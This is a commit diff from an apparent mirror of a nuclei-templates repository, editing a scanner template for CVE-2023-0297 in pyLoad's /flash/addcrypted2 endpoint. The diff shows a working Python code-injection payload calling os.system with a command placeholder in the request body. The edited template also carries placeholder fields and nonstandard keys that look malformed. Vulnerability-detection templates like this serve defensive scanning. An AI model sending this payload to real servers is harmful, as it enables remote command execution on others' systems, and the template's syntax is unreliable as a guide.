daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

CVE-2023-0297.yaml

patch-1
alert('0-0') 2023-07-04 18:28:32 +05:30 committed by GitHub
parent ac84955ae6
commit 276497b314
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 8 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
http/cves/2023/CVE-2023-0297.yaml
View File

@ -1,20 +1,20 @@
id: flash-addcrypted2-rce
id: python-code-injection
info:
name: Flash Addcrypted2 Remote Code Execution
name: Python Code Injection
author: MrHarshvardhan
severity: high
severity: medium
description: |
Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability.
reference:
- https://www.exploit-db.com/exploits/51532
Template to detect Python code injection vulnerabilities.
reference: xxx
requests:
- method: GET
path:
- /flash/addcrypted2
attacks:
- raw:
- 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
- 'CMD_PLACEHOLDER: "{cmd}"'
headers:
Content-type: application/x-www-form-urlencoded
body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
predicates:
- type: status
status: